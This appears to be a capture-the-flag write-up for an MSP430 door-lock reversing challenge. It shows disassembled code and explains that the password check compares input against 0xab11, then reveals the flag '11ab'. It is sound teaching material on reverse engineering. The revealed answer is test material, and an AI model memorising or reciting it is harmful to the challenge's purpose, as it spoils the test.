2400: 0b12 push r11 2402: 0412 push r4 2404: 0441 mov sp, r4 2406: 2452 add #0x4, r4 2408: 3150 e0ff add #0xffe0, sp 240c: 3b40 2045 mov #0x4520, r11 2410: 073c jmp $+0x10 2412: 1b53 inc r11 2414: 8f11 sxt r15 2416: 0f12 push r15 2418: 0312 push #0x0 241a: b012 6424 call #0x2464 241e: 2152 add #0x4, sp 2420: 6f4b mov.b @r11, r15 2422: 4f93 tst.b r15 2424: f623 jnz $-0x12 2426: 3012 0a00 push #0xa 242a: 0312 push #0x0 242c: b012 6424 call #0x2464 2430: 2152 add #0x4, sp 2432: 3012 1f00 push #0x1f 2436: 3f40 dcff mov #0xffdc, r15 243a: 0f54 add r4, r15 243c: 0f12 push r15 243e: 2312 push #0x2 2440: b012 6424 call #0x2464 2444: 3150 0600 add #0x6, sp 2448: b490 11ab dcff cmp #0xab11, -0x24(r4) 244e: 0520 jnz $+0xc 2450: 3012 7f00 push #0x7f 2454: b012 6424 call #0x2464 2458: 2153 incd sp 245a: 3150 2000 add #0x20, sp 245e: 3441 pop r4 2460: 3b41 pop r11 2462: 3041 ret 2464: 1e41 0200 mov 0x2(sp), r14 2468: 0212 push sr 246a: 0f4e mov r14, r15 246c: 8f10 swpb r15 246e: 024f mov r15, sr 2470: 32d0 0080 bis #0x8000, sr 2474: b012 1000 call #0x10 2478: 3241 pop sr 247a: 3041 ret

After stepping through this deobfuscated code, we can see that it is printing out the password input prompt. After entering in the password and stepping forward a few instructions, we see that the program will exit or continue based on the result of cmp #0xab11, -0x24(r4). In other words, the door should open if the password is 0xab11. Wow… so much for that “military-grade encryption”! Let’s try it out (don’t forget the byte order):

Flag (mouse over to reveal)

11ab